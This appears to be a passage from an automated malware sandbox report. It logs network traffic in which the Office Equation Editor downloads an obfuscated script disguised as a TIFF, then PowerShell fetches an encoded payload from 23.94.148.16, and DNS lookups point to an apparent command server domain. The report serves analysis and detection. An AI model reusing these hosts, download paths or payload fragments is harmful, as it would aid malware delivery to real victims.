                                                    Aug 31, 2024 19:25:39.898905993 CEST8049167185.251.91.119192.168.2.22
                                                    Aug 31, 2024 19:25:39.898909092 CEST8049167185.251.91.119192.168.2.22
                                                    Aug 31, 2024 19:25:40.927783012 CEST8049167185.251.91.119192.168.2.22
                                                    Aug 31, 2024 19:25:41.127630949 CEST4916780192.168.2.22185.251.91.119
                                                    Aug 31, 2024 19:25:41.785916090 CEST4916780192.168.2.22185.251.91.119
                                                    Aug 31, 2024 19:26:33.747134924 CEST4916680192.168.2.22185.251.91.119
                                                    Aug 31, 2024 19:26:52.618242025 CEST4916880192.168.2.22185.251.91.119
                                                    Aug 31, 2024 19:26:52.623502970 CEST8049168185.251.91.119192.168.2.22
                                                    Aug 31, 2024 19:26:52.623574018 CEST4916880192.168.2.22185.251.91.119
                                                    Aug 31, 2024 19:26:52.623749971 CEST4916880192.168.2.22185.251.91.119
                                                    Aug 31, 2024 19:26:52.623781919 CEST4916880192.168.2.22185.251.91.119
                                                    Aug 31, 2024 19:26:52.628583908 CEST8049168185.251.91.119192.168.2.22
                                                    Aug 31, 2024 19:26:52.629057884 CEST8049168185.251.91.119192.168.2.22
                                                    Aug 31, 2024 19:26:53.625802994 CEST8049168185.251.91.119192.168.2.22
                                                    Aug 31, 2024 19:26:53.834259033 CEST8049168185.251.91.119192.168.2.22
                                                    Aug 31, 2024 19:26:53.834307909 CEST4916880192.168.2.22185.251.91.119
                                                    Aug 31, 2024 19:27:05.677818060 CEST4916880192.168.2.22185.251.91.119

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Aug 31, 2024 19:25:06.348325968 CEST5456253192.168.2.228.8.8.8
                                                    Aug 31, 2024 19:25:06.359579086 CEST53545628.8.8.8192.168.2.22
                                                    Aug 31, 2024 19:25:31.697573900 CEST5291753192.168.2.228.8.8.8
                                                    Aug 31, 2024 19:25:31.964854002 CEST53529178.8.8.8192.168.2.22
                                                    Aug 31, 2024 19:25:31.970921040 CEST6275153192.168.2.228.8.8.8
                                                    Aug 31, 2024 19:25:32.069288969 CEST53627518.8.8.8192.168.2.22
                                                    Aug 31, 2024 19:25:38.667424917 CEST5789353192.168.2.228.8.8.8
                                                    Aug 31, 2024 19:25:39.677067995 CEST5789353192.168.2.228.8.8.8
                                                    Aug 31, 2024 19:25:39.864599943 CEST53578938.8.8.8192.168.2.22
                                                    Aug 31, 2024 19:25:39.880815983 CEST5482153192.168.2.228.8.8.8
                                                    Aug 31, 2024 19:25:39.888066053 CEST53548218.8.8.8192.168.2.22
                                                    Aug 31, 2024 19:25:40.226501942 CEST53578938.8.8.8192.168.2.22
                                                    Aug 31, 2024 19:26:51.907284021 CEST5471953192.168.2.228.8.8.8
                                                    Aug 31, 2024 19:26:51.914275885 CEST53547198.8.8.8192.168.2.22
                                                    Aug 31, 2024 19:26:52.037043095 CEST4988153192.168.2.228.8.8.8
                                                    Aug 31, 2024 19:26:52.270508051 CEST53498818.8.8.8192.168.2.22
                                                    Aug 31, 2024 19:26:52.271166086 CEST4988153192.168.2.228.8.8.8
                                                    Aug 31, 2024 19:26:52.549982071 CEST53498818.8.8.8192.168.2.22
                                                    Aug 31, 2024 19:26:52.550226927 CEST4988153192.168.2.228.8.8.8
                                                    Aug 31, 2024 19:26:52.567785025 CEST53498818.8.8.8192.168.2.22

                                                    ICMP Packets

                                                    TimestampSource IPDest IPChecksumCodeType
                                                    Aug 31, 2024 19:25:40.226615906 CEST192.168.2.228.8.8.8d012(Port unreachable)Destination Unreachable

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Aug 31, 2024 19:25:06.348325968 CEST192.168.2.228.8.8.80xc44cStandard query (0)ia803104.us.archive.orgA (IP address)IN (0x0001)false
                                                    Aug 31, 2024 19:25:31.697573900 CEST192.168.2.228.8.8.80xa59fStandard query (0)prolinice.gaA (IP address)IN (0x0001)false
                                                    Aug 31, 2024 19:25:31.970921040 CEST192.168.2.228.8.8.80x575cStandard query (0)prolinice.gaA (IP address)IN (0x0001)false
                                                    Aug 31, 2024 19:25:38.667424917 CEST192.168.2.228.8.8.80xe944Standard query (0)prolinice.gaA (IP address)IN (0x0001)false
                                                    Aug 31, 2024 19:25:39.677067995 CEST192.168.2.228.8.8.80xe944Standard query (0)prolinice.gaA (IP address)IN (0x0001)false
                                                    Aug 31, 2024 19:25:39.880815983 CEST192.168.2.228.8.8.80xcee6Standard query (0)prolinice.gaA (IP address)IN (0x0001)false
                                                    Aug 31, 2024 19:26:51.907284021 CEST192.168.2.228.8.8.80xebecStandard query (0)prolinice.gaA (IP address)IN (0x0001)false
                                                    Aug 31, 2024 19:26:52.037043095 CEST192.168.2.228.8.8.80x15a2Standard query (0)prolinice.gaA (IP address)IN (0x0001)false
                                                    Aug 31, 2024 19:26:52.271166086 CEST192.168.2.228.8.8.80x15a2Standard query (0)prolinice.gaA (IP address)IN (0x0001)false
                                                    Aug 31, 2024 19:26:52.550226927 CEST192.168.2.228.8.8.80x15a2Standard query (0)prolinice.gaA (IP address)IN (0x0001)false

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Aug 31, 2024 19:25:06.359579086 CEST8.8.8.8192.168.2.220xc44cNo error (0)ia803104.us.archive.org207.241.232.154A (IP address)IN (0x0001)false
                                                    Aug 31, 2024 19:25:31.964854002 CEST8.8.8.8192.168.2.220xa59fNo error (0)prolinice.ga185.251.91.119A (IP address)IN (0x0001)false
                                                    Aug 31, 2024 19:25:32.069288969 CEST8.8.8.8192.168.2.220x575cNo error (0)prolinice.ga185.251.91.119A (IP address)IN (0x0001)false
                                                    Aug 31, 2024 19:25:39.864599943 CEST8.8.8.8192.168.2.220xe944No error (0)prolinice.ga185.251.91.119A (IP address)IN (0x0001)false
                                                    Aug 31, 2024 19:25:39.888066053 CEST8.8.8.8192.168.2.220xcee6No error (0)prolinice.ga185.251.91.119A (IP address)IN (0x0001)false
                                                    Aug 31, 2024 19:25:40.226501942 CEST8.8.8.8192.168.2.220xe944No error (0)prolinice.ga185.251.91.119A (IP address)IN (0x0001)false
                                                    Aug 31, 2024 19:26:51.914275885 CEST8.8.8.8192.168.2.220xebecNo error (0)prolinice.ga185.251.91.119A (IP address)IN (0x0001)false
                                                    Aug 31, 2024 19:26:52.270508051 CEST8.8.8.8192.168.2.220x15a2No error (0)prolinice.ga185.251.91.119A (IP address)IN (0x0001)false
                                                    Aug 31, 2024 19:26:52.549982071 CEST8.8.8.8192.168.2.220x15a2No error (0)prolinice.ga185.251.91.119A (IP address)IN (0x0001)false
                                                    Aug 31, 2024 19:26:52.567785025 CEST8.8.8.8192.168.2.220x15a2No error (0)prolinice.ga185.251.91.119A (IP address)IN (0x0001)false

                                                    HTTP Request Dependency Graph

                                                    • ia803104.us.archive.org
                                                    • 23.94.148.16
                                                    • cpbrvhywlnsy.com
                                                      • prolinice.ga
                                                    • wehtwifahcxeheu.com

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.224916323.94.148.16803312C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    TimestampBytes transferredDirectionData
                                                    Aug 31, 2024 19:25:01.742921114 CEST336OUTGET /90/verynicebuttersmoothcakeicream.tIF HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                    Host: 23.94.148.16
                                                    Connection: Keep-Alive
                                                    Aug 31, 2024 19:25:02.423346996 CEST1236INHTTP/1.1 200 OK
                                                    Date: Sat, 31 Aug 2024 17:25:01 GMT
                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                    Last-Modified: Fri, 30 Aug 2024 01:22:53 GMT
                                                    ETag: "2cb2c-620dc6e2b6890"
                                                    Accept-Ranges: bytes
                                                    Content-Length: 183084
                                                    Keep-Alive: timeout=5, max=100
                                                    Connection: Keep-Alive
                                                    Content-Type: image/tiff
                                                    Data Raw: ff fe 0d 00 0a 00 61 00 4f 00 4c 00 68 00 4b 00 66 00 4c 00 71 00 4a 00 55 00 20 00 3d 00 20 00 22 00 5a 00 6e 00 66 00 4c 00 57 00 6d 00 43 00 63 00 47 00 6e 00 22 00 0d 00 0a 00 55 00 7a 00 70 00 75 00 4c 00 4e 00 4e 00 66 00 4b 00 6b 00 20 00 3d 00 20 00 22 00 4f 00 65 00 68 00 41 00 51 00 57 00 55 00 78 00 4c 00 4c 00 22 00 0d 00 0a 00 4c 00 63 00 67 00 4f 00 47 00 4b 00 6d 00 4b 00 63 00 4c 00 20 00 3d 00 20 00 22 00 48 00 62 00 4c 00 6b 00 4c 00 74 00 4c 00 57 00 63 00 51 00 22 00 0d 00 0a 00 76 00 63 00 55 00 73 00 66 00 6c 00 5a 00 52 00 6c 00 43 00 20 00 3d 00 20 00 22 00 6d 00 4c 00 75 00 62 00 53 00 54 00 6b 00 4b 00 57 00 68 00 22 00 0d 00 0a 00 6b 00 4f 00 47 00 47 00 4a 00 41 00 6c 00 55 00 65 00 66 00 20 00 3d 00 20 00 22 00 5a 00 52 00 66 00 4b 00 7a 00 57 00 4c 00 5a 00 4a 00 62 00 22 00 0d 00 0a 00 55 00 7a 00 47 00 4f 00 68 00 62 00 69 00 57 00 57 00 55 00 20 00 3d 00 20 00 22 00 5a 00 68 00 69 00 4b 00 4a 00 4c 00 47 00 63 00 78 00 4c 00 22 00 0d 00 0a 00 52 00 4e 00 57 00 57 00 [TRUNCATED]
                                                    Data Ascii: aOLhKfLqJU = "ZnfLWmCcGn"UzpuLNNfKk = "OehAQWUxLL"LcgOGKmKcL = "HbLkLtLWcQ"vcUsflZRlC = "mLubSTkKWh"kOGGJAlUef = "ZRfKzWLZJb"UzGOhbiWWU = "ZhiKJLGcxL"RNWWPcWLpk = "inLcRaLORT"LJRHpWOLiA = "HANiCKKaoW"LlixubWiPa = "eCPxbZkAQc"caWilmiUZo = "PObfcPWtmW"pbnQmpoiKu = "QkZAvlIxcJ"PqiGNOkWuS = "uNUKciGpdh"UgnILezUit = "IWGcLuhWHk"oakCeoALzi = "PWZZKmAOlf"CNiPKnohse = "NGUqLdizGW"PcKPTWkeQL = "shNHbzkWTW"LNGLtAHidG = "khUhJAiZPW
                                                    Aug 31, 2024 19:25:02.423366070 CEST1236INData Raw: 00 22 00 0d 00 0a 00 0d 00 0a 00 50 00 63 00 5a 00 57 00 68 00 61 00 55 00 61 00 51 00 73 00 20 00 3d 00 20 00 22 00 63 00 63 00 76 00 47 00 47 00 6b 00 48 00 47 00 54 00 66 00 22 00 0d 00 0a 00 7a 00 7a 00 6b 00 50 00 78 00 4c 00 4b 00 4e 00 47
                                                    Data Ascii: "PcZWhaUaQs = "ccvGGkHGTf"zzkPxLKNGC = "SUNZkCApGd"mUNkAGmWGa = "kitbcKLGKi"hUzaUBiiqN = "WahkeKItqC"kWenPSkG
                                                    Aug 31, 2024 19:25:02.423372984 CEST1236INData Raw: 00 57 00 69 00 6b 00 69 00 41 00 70 00 62 00 63 00 6f 00 20 00 3d 00 20 00 22 00 69 00 6d 00 71 00 74 00 57 00 71 00 6b 00 6d 00 65 00 69 00 22 00 0d 00 0a 00 47 00 4a 00 65 00 66 00 63 00 67 00 4c 00 70 00 6b 00 57 00 20 00 3d 00 20 00 22 00 4c
                                                    Data Ascii: WikiApbco = "imqtWqkmei"GJefcgLpkW = "LmCnuhLqRq"eZKNsGLPNl = "fxhcLrkpAL"snPmZvWWSG = "xBrqGBbUAi"KzPWLLkiOo = "
                                                    Aug 31, 2024 19:25:02.423536062 CEST672INData Raw: 00 57 00 75 00 57 00 22 00 0d 00 0a 00 51 00 6f 00 6c 00 57 00 50 00 5a 00 53 00 7a 00 6e 00 5a 00 20 00 3d 00 20 00 22 00 4c 00 75 00 47 00 4c 00 6d 00 47 00 69 00 6f 00 69 00 71 00 22 00 0d 00 0a 00 6d 00 65 00 5a 00 63 00 6c 00 41 00 74 00 78
                                                    Data Ascii: WuW"QolWPZSznZ = "LuGLmGioiq"meZclAtxgP = "ixfhdWNGWf"WPcAxtpLoT = "KobKveqcWv"cWfHpZiKLm = "cWbLiuZLiZ"xaOmBAo
                                                    Aug 31, 2024 19:25:02.423567057 CEST1236INData Raw: 00 55 00 71 00 74 00 69 00 50 00 7a 00 20 00 3d 00 20 00 22 00 50 00 41 00 57 00 69 00 78 00 6b 00 55 00 5a 00 71 00 4c 00 22 00 0d 00 0a 00 6f 00 74 00 68 00 4c 00 47 00 6f 00 61 00 4c 00 4f 00 74 00 20 00 3d 00 20 00 22 00 47 00 4e 00 55 00 54
                                                    Data Ascii: UqtiPz = "PAWixkUZqL"othLGoaLOt = "GNUTJWZmWi"gPGvnsKLhk = "GPKUWLGAjL"hGpgxKJoOi = "iUfqKKPirL"JnbhlCdIPn = "h
                                                    Aug 31, 2024 19:25:02.423577070 CEST1236INData Raw: 00 22 00 0d 00 0a 00 0d 00 0a 00 63 00 65 00 57 00 57 00 41 00 50 00 4c 00 78 00 49 00 6d 00 20 00 3d 00 20 00 22 00 43 00 66 00 57 00 55 00 78 00 4c 00 57 00 7a 00 4e 00 6e 00 22 00 0d 00 0a 00 63 00 61 00 41 00 55 00 69 00 67 00 5a 00 69 00 6f
                                                    Data Ascii: "ceWWAPLxIm = "CfWUxLWzNn"caAUigZioK = "rUkmGinhuG"RcUiKeZiNA = "JkUmhpmbhi"LbcHkLeKip = "iWGORZbKuz"UeKeCbNC
                                                    Aug 31, 2024 19:25:02.423588991 CEST1236INData Raw: 00 6d 00 6f 00 65 00 69 00 72 00 61 00 70 00 4c 00 4c 00 68 00 6b 00 74 00 75 00 41 00 22 00 0d 00 0a 00 6d 00 4b 00 6f 00 4b 00 67 00 49 00 47 00 63 00 4c 00 68 00 20 00 3d 00 20 00 22 00 57 00 68 00 52 00 41 00 4a 00 4c 00 42 00 71 00 4b 00 4b
                                                    Data Ascii: moeirapLLhktuA"mKoKgIGcLh = "WhRAJLBqKK"WRCppGGmQi = "kfiJqimKZq"WZlBCPoAKC = "xrRWWnTNiW"GIcomWLKGW = "iSuKGOOKe
                                                    Aug 31, 2024 19:25:02.423602104 CEST1236INData Raw: 00 6f 00 6f 00 68 00 69 00 57 00 70 00 6e 00 74 00 22 00 0d 00 0a 00 55 00 70 00 6e 00 69 00 47 00 75 00 61 00 78 00 73 00 72 00 20 00 3d 00 20 00 22 00 57 00 51 00 4a 00 4c 00 55 00 48 00 43 00 4e 00 5a 00 69 00 22 00 0d 00 0a 00 43 00 6e 00 65
                                                    Data Ascii: oohiWpnt"UpniGuaxsr = "WQJLUHCNZi"CnefPdRpAA = "LupNZRiWKh"WmiBnTsKLN = "mBmLxqBcWk"LLgBAKLLpi = "zfGquUkLek"dJ
                                                    Aug 31, 2024 19:25:02.423787117 CEST1236INData Raw: 00 57 00 66 00 22 00 0d 00 0a 00 55 00 62 00 6e 00 66 00 78 00 74 00 4c 00 65 00 6d 00 4c 00 20 00 3d 00 20 00 22 00 4b 00 63 00 6d 00 68 00 41 00 66 00 41 00 4c 00 6b 00 54 00 22 00 0d 00 0a 00 4c 00 62 00 4c 00 55 00 43 00 63 00 4b 00 72 00 52
                                                    Data Ascii: Wf"UbnfxtLemL = "KcmhAfALkT"LbLUCcKrRe = "icOkzaLlQf"jZiUOWCtBo = "HPxmrAZGue"INepCsiARN = "KfkNookjRO"UHRecU
                                                    Aug 31, 2024 19:25:02.423799038 CEST1236INData Raw: 00 54 00 57 00 7a 00 7a 00 6d 00 67 00 66 00 6c 00 49 00 22 00 0d 00 0a 00 0d 00 0a 00 63 00 74 00 4c 00 78 00 57 00 6e 00 74 00 57 00 68 00 6e 00 20 00 3d 00 20 00 22 00 47 00 41 00 66 00 63 00 75 00 57 00 4e 00 62 00 65 00 57 00 22 00 0d 00 0a
                                                    Data Ascii: TWzzmgflI"ctLxWntWhn = "GAfcuWNbeW"dUAlnmpLmk = "fGicWiWfAG"ZbfetKOanL = "iKfLTqcxzz"iZKkLWudoL = "koCWiZGLPk"
                                                    Aug 31, 2024 19:25:02.423871040 CEST1236INData Raw: 00 6d 00 4c 00 43 00 78 00 65 00 22 00 0d 00 0a 00 66 00 4e 00 5a 00 61 00 74 00 68 00 4c 00 7a 00 6d 00 48 00 20 00 3d 00 20 00 22 00 6b 00 47 00 78 00 69 00 4f 00 53 00 4c 00 63 00 70 00 6e 00 22 00 0d 00 0a 00 41 00 4b 00 6a 00 47 00 70 00 57
                                                    Data Ascii: mLCxe"fNZathLzmH = "kGxiOSLcpn"AKjGpWiZLd = "pdLqqhWNAW"eReWixnzGp = "buNbeNkeLL"KckWLaifhk = "SlLWLzjxLL"pnLLj


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.224916523.94.148.16803628C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    Aug 31, 2024 19:25:08.947418928 CEST73OUTGET /90/WEFV.txt HTTP/1.1
                                                    Host: 23.94.148.16
                                                    Connection: Keep-Alive
                                                    Aug 31, 2024 19:25:09.426656961 CEST1236INHTTP/1.1 200 OK
                                                    Date: Sat, 31 Aug 2024 17:25:09 GMT
                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                    Last-Modified: Thu, 29 Aug 2024 23:16:31 GMT
                                                    ETag: "c558-620daaa44438d"
                                                    Accept-Ranges: bytes
                                                    Content-Length: 50520
                                                    Keep-Alive: timeout=5, max=100
                                                    Connection: Keep-Alive
                                                    Content-Type: text/plain
                                                    Data Raw: 3d 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED]
                                                    Data Ascii: ==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                    Aug 31, 2024 19:25:09.426676989 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                    Aug 31, 2024 19:25:09.426681995 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                    Aug 31, 2024 19:25:09.426752090 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                    Aug 31, 2024 19:25:09.426758051 CEST896INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                    Aug 31, 2024 19:25:09.426764011 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                    Aug 31, 2024 19:25:09.426769018 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                    Aug 31, 2024 19:25:09.426774979 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                    Aug 31, 2024 19:25:09.427326918 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                    Aug 31, 2024 19:25:09.427340984 CEST1236INData Raw: 6c 5a 79 54 62 67 51 4c 70 31 54 70 51 41 53 4c 56 30 71 35 76 55 47 64 62 51 77 58 72 48 30 61 65 56 52 48 75 4e 43 45 68 30 53 4c 74 30 31 61 72 30 53 51 72 33 55 4c 74 75 36 42 64 73 42 76 6f 43 74 48 52 72 74 48 65 34 4b 65 30 6a 62 42 6a 56
                                                    Data Ascii: lZyTbgQLp1TpQASLV0q5vUGdbQwXrH0aeVRHuNCEh0SLt01ar0SQr3ULtu6BdsBvoCtHRrtHe4Ke0jbBjVxWTNmJ1oI1zvvEjNBetsVLskcbyjTWj/12ZNmXbh1Ysh30idRtRU5F+iTIV09k9ylxZG/mlwYHtcWCb1SNSEAF9KZ/G8tEjbZZdMbl7AWQdwSLj0BuVkpll8ZFsMyab06YrM4KiWQHwU2K25QJN0VLFG0SkHbJjNx
                                                    Aug 31, 2024 19:25:09.432010889 CEST1236INData Raw: 75 46 33 6e 62 47 66 73 55 37 61 37 42 4c 79 49 38 31 36 5a 57 4a 34 79 66 4b 70 77 55 32 43 54 34 55 4a 79 68 4e 58 44 32 34 55 4c 6a 51 59 54 32 50 43 2b 65 75 62 46 39 6d 41 42 6c 30 58 53 5a 74 2f 74 44 48 4d 42 35 46 7a 61 5a 48 4d 45 34 4f
